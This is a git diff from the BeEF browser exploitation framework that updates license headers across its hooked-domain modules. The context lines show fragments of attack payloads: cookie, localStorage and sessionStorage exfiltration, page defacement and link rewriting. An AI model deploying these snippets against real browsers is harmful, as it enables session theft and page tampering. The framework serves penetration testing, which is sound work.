diff --git a/modules/browser/hooked_domain/alert_dialog/module.rb b/modules/browser/hooked_domain/alert_dialog/module.rb
index a1750451a..b4eea8e80 100644
--- a/modules/browser/hooked_domain/alert_dialog/module.rb
+++ b/modules/browser/hooked_domain/alert_dialog/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Alert_dialog < BeEF::Core::Command
   
diff --git a/modules/browser/hooked_domain/deface_web_page/command.js b/modules/browser/hooked_domain/deface_web_page/command.js
index feff12512..b78cce34d 100644
--- a/modules/browser/hooked_domain/deface_web_page/command.js
+++ b/modules/browser/hooked_domain/deface_web_page/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	document.body.innerHTML = "<%= @deface_content %>";
diff --git a/modules/browser/hooked_domain/deface_web_page/config.yaml b/modules/browser/hooked_domain/deface_web_page/config.yaml
index 8d57a6cfe..ff51d8082 100644
--- a/modules/browser/hooked_domain/deface_web_page/config.yaml
+++ b/modules/browser/hooked_domain/deface_web_page/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/browser/hooked_domain/deface_web_page/module.rb b/modules/browser/hooked_domain/deface_web_page/module.rb
index ec5affdfc..e05b14404 100644
--- a/modules/browser/hooked_domain/deface_web_page/module.rb
+++ b/modules/browser/hooked_domain/deface_web_page/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Deface_web_page < BeEF::Core::Command
 
diff --git a/modules/browser/hooked_domain/get_cookie/command.js b/modules/browser/hooked_domain/get_cookie/command.js
index 7f0049186..93ae9ec01 100644
--- a/modules/browser/hooked_domain/get_cookie/command.js
+++ b/modules/browser/hooked_domain/get_cookie/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'cookie='+document.cookie);
diff --git a/modules/browser/hooked_domain/get_cookie/config.yaml b/modules/browser/hooked_domain/get_cookie/config.yaml
index a5670e31e..f63a389dd 100644
--- a/modules/browser/hooked_domain/get_cookie/config.yaml
+++ b/modules/browser/hooked_domain/get_cookie/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/browser/hooked_domain/get_cookie/module.rb b/modules/browser/hooked_domain/get_cookie/module.rb
index ba0fc1350..81061bc89 100644
--- a/modules/browser/hooked_domain/get_cookie/module.rb
+++ b/modules/browser/hooked_domain/get_cookie/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Get_cookie < BeEF::Core::Command
 
diff --git a/modules/browser/hooked_domain/get_local_storage/command.js b/modules/browser/hooked_domain/get_local_storage/command.js
index 72db98fd6..47ed1855b 100644
--- a/modules/browser/hooked_domain/get_local_storage/command.js
+++ b/modules/browser/hooked_domain/get_local_storage/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 	if ('localStorage' in window && window['localStorage'] !== null) {
 		beef.net.send("<%= @command_url %>", <%= @command_id %>, "localStorage="+JSON.stringify(window['localStorage']));
diff --git a/modules/browser/hooked_domain/get_local_storage/config.yaml b/modules/browser/hooked_domain/get_local_storage/config.yaml
index f008244b3..00e8e7f37 100644
--- a/modules/browser/hooked_domain/get_local_storage/config.yaml
+++ b/modules/browser/hooked_domain/get_local_storage/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/browser/hooked_domain/get_local_storage/module.rb b/modules/browser/hooked_domain/get_local_storage/module.rb
index fd57f511e..c65b063c0 100644
--- a/modules/browser/hooked_domain/get_local_storage/module.rb
+++ b/modules/browser/hooked_domain/get_local_storage/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Get_local_storage < BeEF::Core::Command
   
diff --git a/modules/browser/hooked_domain/get_page_html/command.js b/modules/browser/hooked_domain/get_page_html/command.js
index 51926584c..2151880a2 100644
--- a/modules/browser/hooked_domain/get_page_html/command.js
+++ b/modules/browser/hooked_domain/get_page_html/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	try {
diff --git a/modules/browser/hooked_domain/get_page_html/config.yaml b/modules/browser/hooked_domain/get_page_html/config.yaml
index a4e51a376..0f86badae 100644
--- a/modules/browser/hooked_domain/get_page_html/config.yaml
+++ b/modules/browser/hooked_domain/get_page_html/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/browser/hooked_domain/get_page_html/module.rb b/modules/browser/hooked_domain/get_page_html/module.rb
index 6ef33ad89..2d2eecac8 100644
--- a/modules/browser/hooked_domain/get_page_html/module.rb
+++ b/modules/browser/hooked_domain/get_page_html/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Get_page_html < BeEF::Core::Command
 
diff --git a/modules/browser/hooked_domain/get_page_links/command.js b/modules/browser/hooked_domain/get_page_links/command.js
index 9f12337ac..0af4ca888 100644
--- a/modules/browser/hooked_domain/get_page_links/command.js
+++ b/modules/browser/hooked_domain/get_page_links/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	beef.net.send("<%= @command_url %>", <%= @command_id %>, "links="+beef.dom.getLinks());
diff --git a/modules/browser/hooked_domain/get_page_links/config.yaml b/modules/browser/hooked_domain/get_page_links/config.yaml
index 1b1ed13f3..d316522a2 100644
--- a/modules/browser/hooked_domain/get_page_links/config.yaml
+++ b/modules/browser/hooked_domain/get_page_links/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/browser/hooked_domain/get_page_links/module.rb b/modules/browser/hooked_domain/get_page_links/module.rb
index c8c005c96..66c639ebd 100644
--- a/modules/browser/hooked_domain/get_page_links/module.rb
+++ b/modules/browser/hooked_domain/get_page_links/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Get_page_links < BeEF::Core::Command
 
diff --git a/modules/browser/hooked_domain/get_session_storage/command.js b/modules/browser/hooked_domain/get_session_storage/command.js
index 9e23c3c9e..13346737e 100644
--- a/modules/browser/hooked_domain/get_session_storage/command.js
+++ b/modules/browser/hooked_domain/get_session_storage/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 	if ('sessionStorage' in window && window['sessionStorage'] !== null) {
 		beef.net.send("<%= @command_url %>", <%= @command_id %>, "sessionStorage="+JSON.stringify(window['sessionStorage']));
diff --git a/modules/browser/hooked_domain/get_session_storage/config.yaml b/modules/browser/hooked_domain/get_session_storage/config.yaml
index 39d1cff08..5f54cb91c 100644
--- a/modules/browser/hooked_domain/get_session_storage/config.yaml
+++ b/modules/browser/hooked_domain/get_session_storage/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/browser/hooked_domain/get_session_storage/module.rb b/modules/browser/hooked_domain/get_session_storage/module.rb
index 6b75c2eeb..40a196ae8 100644
--- a/modules/browser/hooked_domain/get_session_storage/module.rb
+++ b/modules/browser/hooked_domain/get_session_storage/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Get_session_storage < BeEF::Core::Command
   
diff --git a/modules/browser/hooked_domain/get_stored_credentials/command.js b/modules/browser/hooked_domain/get_stored_credentials/command.js
index 948435a53..080b4e49e 100644
--- a/modules/browser/hooked_domain/get_stored_credentials/command.js
+++ b/modules/browser/hooked_domain/get_stored_credentials/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var form_data = new Array();
diff --git a/modules/browser/hooked_domain/get_stored_credentials/config.yaml b/modules/browser/hooked_domain/get_stored_credentials/config.yaml
index 1c01a0391..f610c5fca 100644
--- a/modules/browser/hooked_domain/get_stored_credentials/config.yaml
+++ b/modules/browser/hooked_domain/get_stored_credentials/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/browser/hooked_domain/get_stored_credentials/module.rb b/modules/browser/hooked_domain/get_stored_credentials/module.rb
index 243fddcbe..0e1277855 100644
--- a/modules/browser/hooked_domain/get_stored_credentials/module.rb
+++ b/modules/browser/hooked_domain/get_stored_credentials/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Get_stored_credentials < BeEF::Core::Command
 
diff --git a/modules/browser/hooked_domain/link_rewrite/command.js b/modules/browser/hooked_domain/link_rewrite/command.js
index 03c9ac917..75702b158 100644
--- a/modules/browser/hooked_domain/link_rewrite/command.js
+++ b/modules/browser/hooked_domain/link_rewrite/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
     beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+beef.dom.rewriteLinks('<%= @url %>')+' links rewritten to <%= @url %>');
 });
diff --git a/modules/browser/hooked_domain/link_rewrite/config.yaml b/modules/browser/hooked_domain/link_rewrite/config.yaml
index f458eb1e0..5c5cbecf8 100644
--- a/modules/browser/hooked_domain/link_rewrite/config.yaml
+++ b/modules/browser/hooked_domain/link_rewrite/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/browser/hooked_domain/link_rewrite/module.rb b/modules/browser/hooked_domain/link_rewrite/module.rb
index 9176a2173..dabb6f189 100644
--- a/modules/browser/hooked_domain/link_rewrite/module.rb
+++ b/modules/browser/hooked_domain/link_rewrite/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Link_rewrite < BeEF::Core::Command
   
diff --git a/modules/browser/hooked_domain/link_rewrite_sslstrip/command.js b/modules/browser/hooked_domain/link_rewrite_sslstrip/command.js
index 9e68bc542..de3739f8d 100644
--- a/modules/browser/hooked_domain/link_rewrite_sslstrip/command.js
+++ b/modules/browser/hooked_domain/link_rewrite_sslstrip/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	selector = "a";
diff --git a/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml b/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml
index 176ec2f69..3ce3065b5 100644
--- a/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml
+++ b/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/browser/hooked_domain/link_rewrite_sslstrip/module.rb b/modules/browser/hooked_domain/link_rewrite_sslstrip/module.rb
index 61d9e8969..f7e32b6b7 100644
--- a/modules/browser/hooked_domain/link_rewrite_sslstrip/module.rb
+++ b/modules/browser/hooked_domain/link_rewrite_sslstrip/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Link_rewrite_sslstrip < BeEF::Core::Command
   
diff --git a/modules/browser/hooked_domain/link_rewrite_tel/command.js b/modules/browser/hooked_domain/link_rewrite_tel/command.js
index d51007a95..355b7ec47 100644
--- a/modules/browser/hooked_domain/link_rewrite_tel/command.js
+++ b/modules/browser/hooked_domain/link_rewrite_tel/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
